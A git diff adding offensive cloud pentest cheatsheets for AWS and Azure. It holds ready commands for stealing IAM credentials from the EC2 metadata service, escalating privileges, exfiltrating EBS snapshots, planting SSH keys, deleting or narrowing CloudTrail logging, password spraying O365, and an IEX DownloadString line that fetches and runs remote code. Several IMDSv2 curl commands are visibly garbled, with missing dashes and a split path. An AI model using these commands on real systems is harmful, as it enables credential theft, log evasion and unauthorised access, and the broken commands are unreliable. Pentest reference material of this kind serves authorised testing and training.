+### Listing roles of an instance + +``` +aws ec2 describe-iam-instance-profile-associations +``` + +## Exploitation +* Initial access can happen by RCE or SSRF +* Metadata can be used to exfiltrate information from the instance + +### Remote code execution + +#### AWS Metadata +If we have remote code execution or SSRF, we can grab metadata information + +``` +curl http://169.254.169.254/latest/meta-data +``` + +##### Grabbing the keys to access the instance + +``` +curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance +``` + +##### Grabbing the keys in metadata version 2 + +```bash +TOKEN=`curl +X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` +&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/meta-data/ +``` + +#### AWS Userdata + +Version 1 + +``` +curl http://169.254.169.254/latest/user-data/ +``` + +Version 2 + +```bash +TOKEN=`curl +X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` +&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/user-data/ +``` + +### Privilege Escalation +* One approach to get a shell in a instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection. +* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services. + +#### Getting information about the key + +``` +aws sts get-caller-identity +``` + +#### Getting policies attached to the IAM user + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +#### Getting information about a specific policy version + +``` +aws iam get-policy-version --policy-arn ARN --version-id ID +``` + +To attach a role to an EC2 instance, we can use the RCE to grab the ID + +``` +curl http://169.254.169.254/latest/meta-data/instance-id +``` + +#### Listing instance profiles + +``` +aws iam list-instance-profiles +``` + +#### Attach an instance profile to an EC2 instance + +``` +aws ec2 associate-iam-instance-profile --instance-id ID --iam-instance-profile Name=ProfileName +``` + +### Credential Access + +* We can grab the credentials by abusing metadata (Web Application with SSRF,RCE and so on) + +#### After the initial access +1. Enumerate the key (Role) + +``` +aws sts get-caller-identity +``` + +2. If there are roles associated with the key, we can grab the credentials by issuing a request to the metadata endpoint (v1 or v2) + +``` +curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PREVIOUS_COMMAND +``` + +3. Configure the aws cli + +``` +aws configure +``` + +Or use enviroment variables. + +### Persistence +* All the persistence techniques works here, SSH persistence, vim backdoor and so on. + +#### SSH Persistence example + +1. Generate SSH Key pair + +``` +ssh-keygen +``` + +2. Add public key to authorized_keys + +``` +echo "PUBLIC_Key" >> /home/user/.ssh/authorized_keys +``` + +3. Use the private key to connect + +``` +ssh -i public_key user@instance +``` + +# Elastic Block Store +* Block storage system used to store persistent data +* It's possible to attach this drive to EC2 and increase the storage (Like and HD, but scalable). +* It's possible to create a snapshot (It will be saved on S3) and create a volume from this snapshot. +* It's possible to attach the snapshot (Backup of BS) to an EC2 instance +* Snapshots can be used as volumes or AMI's + +## Enumeration + +### Enumerating EBS volumes + +``` +aws ec2 describe-volumes +``` + +* If the volume is available, it can be attached to an EC2 instance +* Check if the EBS is encrypted + +### Enumerating Snapshots + +``` +aws ec2 describe-snapshots --owner-ids self +``` + +* Also check if the snapshot is encrypted + +## Exploitation & Data Exfiltration +* Create a snapshot of an EC2 instance, create a volume from snapshot and attach to other EC2 instance. +* User need to have IAM permissions on EC2 +* Maybe we don't have the right to access the instance but have rights to create a snapshot and attach it to another machine. + +### Creating a snapshot of a specified volume + +``` +aws ec2 create-snapshot --volume volumeID --description "Example" --profile profile_name +``` + +### Listing snapshots + +``` +aws ec2 describe-snapshots +``` + +### Creating a volume from a snasphot + +``` +aws ec2 create-volume --snapshot-id ID --availability-zone ZONE --profile profile_name +``` + +* The volume needs to be in the same availability zone as the instance we have access + +### Attaching the volume to an instance + +``` +aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/sdfd -> Can be other value +``` + +### Mounting the volume + +``` +sudo mount /dev/sdfd /directory +``` + +After mounting, we will have access to the disk. + +# RDS - Relational Database Service + +* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar) +* The access is done by using password, password+IAM or password+kerberos +* It's possible to restrict access using restriction such as specific EC2 or lambda or use network level restriction such as vpc, ip. +* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials. + +## Enumeration + +### Listing information about clusters in RDS + +``` +aws rds describe-db-clusters +``` + +### Listing information about RDS instances + +``` +aws rds describe-db-instances +``` + +* IAMDatabaseAuthenticationEnabled: false -> Need password to access the instance + +### Listing information about subnet groups in RDS + +``` +aws rds describe-db-subnet-groups +``` + +### Listing information about database security groups in RDS + +``` +aws rds describe-db-security-groups +``` + +### Listing information about database proxies + +``` +aws rds describe-db-proxies +``` + +## Data exfiltration + +* If the instance is in a security group or VPC, we need to compromise it first to access the database (For example, we compromise an EC2 instance in the same VPC, then its possible to connect) + +### List instances in RDS + +``` +aws rds describe-db-instances +``` + +### List information about the specified security group + +``` +aws ec2 describe-security-groups --group-ids id +``` + +### Password based authentication + +``` +mysql -h hostname -u name -P port -p password +``` + +### IAM Based authentication + +**1. Identify the user** + +``` +aws sts get-caller-identity +``` + +**2. List all policies attached to a role** + +``` +aws iam list-attached-role-policies --role-name name +``` + +**3. Get information about a specific version of a policy** + +``` +aws iam get-policy-version --policy-arn arn --version-id ID +``` + +**4. Get a temporary token from the RDS** + +``` +aws rds generate-db-auth-token --hostname hostname --port port --username username --region region +``` + +* To be easier, we can put it in a variable + +``` +TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --username username --region region) +``` + +**5. Connect to the DB using the token** + +``` +mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --password=$TOKEN +``` + +## SSO & Other Services + +## Single Sign On (SSO) + +* Used to centrally manage access to multiple AWS accounts and applications. +* Provide users a way to interact with all services and applications through one place +* Can be used to manage access and user permissions to all AWS accounts +* The identity source can use AWS SSO's identity store or external identity store (Okta,SAML and similar) + +## CloudTrail + +* Log monitoring service, allow us to continuously monitor and retain account activity related to actions in our AWS account +* Provide event history of AWS account activity, SDKs, command line tools and other services +* Commonly used to detect unsual behavior in AWS account +* Pacu automatically changes the user agent to deceive the logs of cloudtrail + +### Userful Commands + +#### List trails + +``` +aws cloudtrail list-trails +``` + +#### Disabling CloudTrail + +``` +aws cloudtrail delete-trail --name example_trail --profile name +``` + +#### Disable monitoring of events from global events + +``` +aws cloudtrail update-trail --name example_trail --no-include-global-service-event +``` + +#### Disable CloudTrail on specific regions + +``` +aws cloudtrail update-trail --name example_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + +## AWS Shield + +* Used to protect services from Denial of Service Attacks +* There are 2 versions, the standard and the Advanced + +## AWS Waf + +* Used to protect applications against common web application attacks +* Common WAF bypasses can be tested against it +* To detect an WAF, we can use `wafw00f` + +## AWS Inspector + +* Automated security assessment service that helps improve the security and compliance of applications on AWS +* Works with an agent + +## AWS Guard Duty + +* Threat detection service that monitors for malicious activity and unauthorized behavior +* Works by collecting and analyzing logs + +## Virtual Private Cloud + +* Used to create an isolated infrastructure within the cloud, including subnets and so on. +* If the VPC has an internet gateway, means its a public subnet +* Every VPC can have Network ACL's + +## Routing Tables + +A set of rules to determine where the traffic will be directed, comes in form of Destination and Target, defined as follows + +``` +DESTINATION TARGET + +IP local -> VPC Internal +IP igw -> Internet Gateway +IP nat -> NAT Gateway +IP pcx -> VPC Peering +IP vpce -> VPC Endpoint +IP vgw -> VPN Gateway +IP eni -> Network Interface +``` + +* VPC Internal -> Internal IP, no internet connection +* Internet Gateway -> Used to access the internet +* NAT Gateway -> Does the NAT between machines, allows one way connection to the internet +* VPC Peering -> Allows the communication between 2 VPC's +* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway) +* VPN Gateway -> Used to expand the cloud to on premises and vice-versa +* Network Interface -> Network Interfaces + +## Enumeration + +### Listing VPC's + +``` +aws ec2 describe-vpcs +``` + +### Listing VPC's specifing the region + +``` +aws ec2 describe-vpcs --region us-west-1 +``` + +### Listing VPC information by ID + +``` +aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID" +``` + +### Listing subnet's + +``` +aws ec2 describe-subnets +``` + +### Listing subnet's by VPC-id + +``` +aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID" +``` + +### Listing routing tables + +``` +aws ec2 describe-route-tables +``` + +### Listing routing tables by VPC-id + +``` +aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID" +``` + +### Listing Network ACL's + +``` +aws ec2 describe-network-acls +``` + +## Lateral Movement and Pivoting + +* We can abuse VPC peering to do lateral movement + +### Scenario + +* There are 3 VPC's -> A,B,C +* A can access B through peering and B access C. We can use VPC B as a peering pivot to access VPC C from VPC A. +* The lateral movement can be done if we gather keys or other machines +* Always enumerate the subnets to see in which subnet we can access other VPC's + +#### Listing VPC peering connections + +``` +aws ec2 describe-vpc-peering-connections +``` + +#### Listing subnets of specific VPC (Important because the access can be restricted to specific subnets to other VPC's) + +``` +aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID" +``` + +#### Listing routing tables + +``` +aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID" +``` + +#### Listing instances on the specified VPC ID + +``` +aws ec2 describe-instances --filters "Name=vpc-id,Values=ID" +``` + +#### Listing instances on the specified subnet + +``` +aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" +``` + +## References + +* [An introduction to penetration testing AWS - Akimbocore](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) +* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/) +* [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) +* [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) +* [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b) +* [Pacu Open source AWS Exploitation framework - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/) +* [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) +* [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/) +* [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) +* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) +* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) +* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) +* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) +* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) +* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) +* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) +* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) \ No newline at end of file diff --git a/docs/cloud/aws/todo.md b/docs/cloud/aws/todo.md new file mode 100644 index 0000000..30404ce --- /dev/null +++ b/docs/cloud/aws/todo.md @@ -0,0 +1 @@ +TODO \ No newline at end of file diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md new file mode 100644 index 0000000..d7772aa --- /dev/null +++ b/docs/cloud/azure/Cloud - Azure Pentest.md @@ -0,0 +1,1230 @@ +# Cloud - Azure + +## Summary + +* [Azure Recon Tools](#azure-recon-tools) +* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell) + * [Graph API Refresh Token](#graph-api-refresh-token) + * [Graph API Access Token](#graph-api-access-token) +* [Terminology](#terminology) +* [Training](#training) +* [Enumeration](#enumeration) + * [Enumerate valid emails](#enumerate-valid-emails) + * [Enumerate Azure Subdomains](#enumerate-azure-subdomains) + * [Enumerate tenant with Azure AD Powershell](#enumerate-tenant-with-azure-ad-powershell) + * [Enumerate tenant with Az Powershell](#enumerate-tenant-with-az-powershell) + * [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli) + * [Enumerate manually](#enumerate-manually) + * [Enumeration methodology](#enumeration-methodology) +* [Phishing with Evilginx2](#phishing-with-evilginx2) +* [Illicit Consent Grant](#illicit-consent-grant) + * [Register Application](#register-application) + * [Configure Application](#configure-application) + * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated) + * [Setup Vajra](#setup-vajra) +* [Device Code Phish](#device-code-phish) +* [Token from Managed Identity](#token-from-managed-identity) + * [Azure API via Powershell](#azure-api-via-powershell) + * [Azure API via Python Version](#azure-api-via-python-version) + * [Get Tokens](#get-tokens) + * [Use Tokens](#use-tokens) + * [Refresh Tokens](#refresh-token) +* [Stealing Tokens](#stealing-tokens) + * [Stealing tokens from az cli](#stealing-tokens-from-az-cli) + * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell) +* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications) +* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app) +* [Azure Storage Blob](#azure-storage-blob) + * [Enumerate blobs](#enumerate-blobs) + * [SAS URL](#sas-url) + * [List and download blobs](#list-and-download-blobs) +* [Runbook Automation](#runbook-automation) + * [Create a Runbook](#create-a-runbook) + * [Persistence via Automation accounts](#persistence-via-automation-accounts) +* [Virtual Machine RunCommand](#virtual-machine-runcommand) +* [KeyVault Secrets](#keyvault-secrets) +* [Pass The Certificate](#pass--the-certificate) +* [Pass The PRT](#pass-the-prt) +* [Intunes Administration](#intunes-administration) +* [Dynamic Group Membership](#dynamic-group-membership) +* [Administrative Unit](#administrative-unit) +* [Deployment Template](#deployment-template) +* [Application Proxy](#application-proxy) +* [Conditional Access](#conditional-access) +* [Azure AD](#azure-ad) + * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) + * [Password Spray](#password-spray) + * [Convert GUID to SID](#convert-guid-to-sid) +* [Azure AD Connect](#azure-ad-connect) + * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) + * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync) + * [Azure AD Connect - Seamless Single Sign On Silver Ticket](#azure-ad-connect---seamless-single-sign-on-silver-ticket) +* [References](#references) + +## Azure Recon Tools + +* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound + ```powershell + # First, retrieve a refresh token (-r) if username/password isn't supported. + # An access token (-j) isn't recommended because it can expire before the end of azurehound execution + Install-Module AADInternals -Scope CurrentUser + Import-Module AADInternals + $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] + + # Second, launch azurehound collector + ./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json + + ## Connects on your Azure account using the refresh token provided and the tenant of the account + ## and collects every possible objects in contoso.microsoft.com. Results are stored in json + ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" + ## Sets configuration file with connection variables and other things (not required) + ./azurehound configure + ## Collects every objects on all accessible tenants using username/password and prints it to stdout + ./azurehound -u "MattNelson@contoso.onmicrosoft.com" -p "MyVerySecurePassword123" --tenant "contoso.onmicrosoft.com" list + ## Collects every objects on a specific tenant using username/password and stores it in json + ./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com" + ## Collects every objects on all tenants accessible using Service Principal secret + ./azurehound -a "6b5adee8-..." -s "" --tenant "contoso.onmicrosoft.com" list + ## Collects AzureAD info (all except AzureRM info) using JWT access token + ./azurehound -j "ey..." --tenant "contoso.onmicrosoft.com" list az-ad + ## Collects every users using refresh token + ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users + + # List of collections + az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default. + az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information. + + apps: Collects AzureAD application registration objects. + devices: Collects AzureAD devices regardless of join type. + groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible. + key-vaults: Collects AzureRM key vaults. + management-groups: Collects AzureRM management group objects + resource-groups: Collects AzureRM resource group objects + roles: Collects AzureAD admin role objects + service-principals: Collects AzureAD service principals + subscriptions: Collevts AzureRM subscriptions + tenants: Collevts AzureAD tenant objects + users: Collects AzureAD users, including any guest users in the target tenant. + virtual-machines: Collects AzureRM virtual machines + + # GUI access + bolt://localhost:7687 + Username: neo4j + Password: BloodHound + + # Custom Queries : https://hausec.com/2020/11/23/azurehound-cypher-cheatsheet/ + # Cypher query examples: + MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p + MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname + ``` +* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit + ```ps1 + . .\BARK.ps1 + $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" + $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" + $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress + ``` +* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. + ```powershell + pipenv shell + roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] + roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] + roadrecon auth -u test@.onmicrosoft.com -p + roadrecon gather + roadrecon gui + ``` +* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects + ```powershell + # session 1 - backend + pipenv shell + python ssbackend.pyz + + # session 2 - frontend + cd C:\Tools\stormspotter\frontend\dist\spa\ + quasar.cmd serve -p 9091 --history + + # session 3 - collector + pipenv shell + az login -u test@.onmicrosoft.com -p + python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli + + # Web access on http://localhost:9091 + Username: neo4j + Password: BloodHound + Server: bolt://localhost:7687 + ``` +* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites +* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. + ```powershell + # You should use an account with at least read-permission on the assets you want to access + PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File + PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT + PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 + PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 + # resolve the TenantID for an specific username + PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com + ``` +* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud. + ```powershell + git submodule init + git submodule update + PS> Import-Module AzureRM + PS> Import-Module AzuriteExplorer.ps1 + PS> Review-AzureRmSubscription + PS> Review-CustomAzureRmSubscription + ``` +* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping + ```powershell + PS C:> Import-Module .\MicroBurst.psm1 + PS C:> Import-Module .\Get-AzureDomainInfo.ps1 + PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose + ``` +* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins. + Require: + - Read-Only permissions over Azure Directory (Tenant) + - Read-Only permissions over Subscription + - Require AZ and AzureAD module or administrator right + + ```powershell + $ powershell -ExecutionPolicy Bypass -NoProfile + PS C> Import-Module .\SkyArk.ps1 -force + PS C> Start-AzureStealth + PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1') + PS C> Scan-AzureAdmins +* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security + ```powershell + # Require az module ! + $ ipmo .\PowerZure + $ Set-Subscription -Id [idgoeshere] + + # Reader + $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails + + # Contributor + $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" + $ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml" + $ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents + $ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk + + # Owner + $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest + + # Administrator + $ Create-Backdoor, Execute-Backdoor + ``` +* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API + +## Authenticating to the Microsoft Graph API in PowerShell + +* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in) + +| Name | GUID | +|----------------------------|--------------------------------------| +| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 | +| Microsoft Azure CLI | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 | +| Portail Azure | c44b4083-3bb0-49c1-b47d-974e53cbdf3c | + + +### Graph API Refresh Token + +Authenticating to the Microsoft Graph API in PowerShell + +```ps1 +$body = @{ + "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" + "resource" = "https://graph.microsoft.com" # Microsoft Graph API +} +$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" +$Headers=@{} +$Headers["User-Agent"] = $UserAgent +$authResponse = Invoke-RestMethod ` + -UseBasicParsing ` + -Method Post ` + -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" ` + -Headers $Headers ` + -Body $body +$authResponse +``` + +### Graph API Access Token + +This request require getting the Refresh Token. + +```ps1 +$body=@{ + "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" + "grant_type" = "urn:ietf:params:oauth:grant-type:device_code" + "code" = $authResponse.device_code +} +$Tokens = Invoke-RestMethod ` + -UseBasicParsing ` + -Method Post ` + -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" ` + -Headers $Headers ` + -Body $body +$Tokens +``` + + + +## Terminology + +> Basic Azure AD terminologies + +* **Tenant**: An instance of Azure AD and represents a single organization. +* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources. +* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory. +* **Core Domain**: The initial domain name .onmicrosoft.com is the core domain. It is possible to define custom domain names too. + + +## Training + +* AzureGoat : A Damn Vulnerable Azure Infrastructure - https://github.com/ine-labs/AzureGoat + + +## Enumeration + +### Enumerate valid emails + +> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. + +* Validate email + ```powershell + PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt + admin@.onmicrosoft.com - VALID + root@.onmicrosoft.com - INVALID + test@.onmicrosoft.com - VALID + contact@.onmicrosoft.com - INVALID + ``` +* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon + +#### Password spraying + +```powershell +PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1 +PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Verbose +``` + +### Enumerate Azure Subdomains + +```powershell +PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1 +PS> Invoke-EnumerateAzureSubDomains -Base -Verbose +Subdomain Service +--------- ------- +.mail.protection.outlook.com Email +.onmicrosoft.com Microsoft Hosted Domain +``` + +### Enumerate tenant with Azure AD Powershell + +```powershell +Import-Module C:\Tools\AzureAD\AzureAD.psd1 +Import-Module C:\Tools\AzureADPreview\AzureADPreview.psd1 +PS> $passwd = ConvertTo-SecureString "" -AsPlainText -Force +PS> $creds = New-Object System.Management.Automation.PSCredential("test@.onmicrosoft.com", $passwd) +PS Az> Connect-AzureAD -Credential $creds + +PS AzureAD> Get-AzureADUser -All $true +PS AzureAD> Get-AzureADUser -All $true | select UserPrincipalName +PS AzureAD> Get-AzureADGroup -All $true +PS AzureAD> Get-AzureADDevice +PS AzureAD> Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember +PS AzureADPreview> Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName +``` + +### Enumerate tenant with Az Powershell + +```powershell +PS> $passwd = ConvertTo-SecureString "" -AsPlainText -Force +PS> $creds = New-Object System.Management.Automation.PSCredential ("test@.onmicrosoft.com", $passwd) +PS Az> Connect-AzAccount -Credential $creds + +PS Az> Get-AzResource +PS Az> Get-AzRoleAssignment -SignInName test@.onmicrosoft.com +PS Az> Get-AzVM | fl +PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} +PS Az> Get-AzFunctionApp +PS Az> Get-AzStorageAccount | fl +PS Az> Get-AzKeyVault +``` + +### Enumerate tenant with az cli + +```powershell +PS> az login -u test@.onmicrosoft.com -p +PS> az vm list +PS> az vm list --query "[].[name]" -o table +PS> az webapp list +PS> az functionapp list --query "[].[name]" -o table +PS> az storage account list +PS> az keyvault list +``` + +### Enumerate manually + +* Federation with Azure AD or O365 + ```powershell + https://login.microsoftonline.com/getuserrealm.srf?login=@&xml=1 + https://login.microsoftonline.com/getuserrealm.srf?login=root@.onmicrosoft.com&xml=1 + ``` +* Get the Tenant ID + ```powershell + https://login.microsoftonline.com//.well-known/openid-configuration + https://login.microsoftonline.com/.onmicrosoft.com/.well-known/openid-configuration + ``` + +## Enumeration methodology + +```powershell +# Check Azure Joined +PS> dsregcmd.exe /status ++----------------------------------------------------------------------+ +| Device State | ++----------------------------------------------------------------------+ + AzureAdJoined : YES + EnterpriseJoined : NO + DomainJoined : NO + Device Name : jumpvm + +# Enumerate resources +PS Az> Get-AzResource + +# Enumerate role assignments +PS Az> Get-AzRoleAssignment -Scope /subscriptions//resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/` + +# Get info on a role +PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor" + +# Get info user +PS AzureAD> Get-AzureADUser -ObjectId +PS AzureAD> Get-AzureADUser -ObjectId test@.onmicrosoft.com | fl * + +# List all groups +PS AzureAD> Get-AzureADGroup -All $true + +# Get members of a group +PS Az> Get-AzADGroup -DisplayName '' +PS Az> Get-AzADGroupMember -GroupDisplayName '' | select UserPrincipalName + +# Get Azure AD information +PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1 +PS AADInternals> Get-AADIntLoginInformation -UserName admin@.onmicrosoft.com +PS AADInternals> Get-AADIntTenantID -Domain .onmicrosoft.com # Get Tenant ID +PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName # Get all the information + +# Check if there is a user logged-in to az cli +PS> az ad signed-in-user show + +# Check AppID Alternative Names/Display Name +PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq ""} | fl + + +# Get all application objects registered using the current tenant +PS AzureAD> Get-AzureADApplication -All $true + +# Get all details about an application +PS AzureAD> Get-AzureADApplication -ObjectId | fl * + +# List all VM's the user has access to +PS Az> Get-AzVM +PS Az> Get-AzVM | fl + +# Get all function apps +PS Az> Get-AzFunctionApp + +# Get all webapps +PS Az> Get-AzWebApp +PS Az> Get-AzWebApp | select-object Name, Type, Hostnames + +# List all storage accounts +PS Az> Get-AzStorageAccount +PS Az> Get-AzStorageAccount | fl + +# List all keyvaults +PS 